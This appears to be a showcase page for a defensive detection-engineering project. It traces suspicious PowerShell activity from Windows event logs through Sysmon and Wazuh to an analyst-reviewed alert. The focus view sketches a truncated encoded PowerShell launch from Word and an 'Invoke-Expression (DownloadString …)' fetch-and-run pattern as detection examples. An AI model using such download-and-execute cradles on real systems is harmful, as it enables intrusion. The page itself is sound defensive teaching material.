DetectionHunter
// every alert starts as behavior

Architecture

From endpoint behavior to analyst-ready detection. DetectionHunter visualizes how Windows activity is logged, enriched with Sysmon, collected by Wazuh, matched against detection rules, and reviewed by analysts to continuously improve defensive visibility.

attack-to-alert rail · live
Endpoint · behavior
● AlertHIGH
Suspicious PowerShell Behavior
technique: T1059.001
source: windows endpoint
status: needs review
  • Endpoint
  • Event Logs
  • PowerShell
  • Sysmon
  • Wazuh Agent
  • Wazuh Manager
  • Detection Rules
  • Alert
  • Analyst

Pipeline layers

behavior → signal → decision
layer 01
Endpoint Layer

Windows workstations and servers where behavior originates — processes, logons, scripts, file and network activity.

layer 02
Logging Layer

Native Windows channels record activity: 4688 process creation, 4624/4625 logons, system and application events.

layer 03
PowerShell Behavior Layer

PowerShell/Operational 4104 script block and 4103 module logging surface what was actually executed, including obfuscated payloads.

layer 04
Sysmon Enrichment Layer

Sysmon adds parent process, command line, hashes, network connections, image paths, and user context to raw events.

layer 05
Wazuh Collection Layer

The Wazuh agent subscribes to event channels and forwards normalized telemetry to the manager.

layer 06
Detection Rules Layer

Decoders parse events; rule logic separates noise from suspicious behavior and emits scored alerts.

layer 07
Alert Layer

A suspicious match becomes an analyst-ready alert with technique mapping, severity, source, and status.

layer 08
Analyst Review Layer

Triage the alert: validate evidence, confirm scope, decide on response, and capture findings.

layer 09
Improvement Layer

Review feeds back into rule tuning, telemetry gaps, and new detections. Detection engineering is continuous.

// focus view

PowerShell · T1059.001

A single suspicious PowerShell invocation traced from execution through Windows logging, PowerShell script block capture, Sysmon enrichment, Wazuh rule match, alert generation, and analyst review.

  1. 01
    Execution
    powershell.exe -EncodedCommand …
  2. 02
    Windows 4688
    Process created — parent: winword.exe
  3. 03
    PowerShell 4104
    Script block: Invoke-Expression (DownloadString …)
  4. 04
    Sysmon EID 1
    Hash · CLI · ParentImage · User · Network
  5. 05
    Wazuh Rule
    match: suspicious_powershell_execution
  6. 06
    Alert
    T1059.001 · High · status: needs review
  7. 07
    Analyst
    Validate cmdline, user, host, timestamp → tune
● Alertseverity: HIGH
Suspicious PowerShell Execution
technique
T1059.001 — Command and Scripting Interpreter: PowerShell
telemetry
4688 · 4104 · Sysmon EID 1
detection
wazuh rule match
source
windows endpoint
analyst task
review command line, parent process, user, host, timestamp
// secondary path · network visibility
Suricata → eve.json → Wazuh → Correlated alert
Suricataeve.jsonWazuh ingestNetwork alertCorrelation w/ endpoint

Detection engineering turns raw behavior into defensive clarity.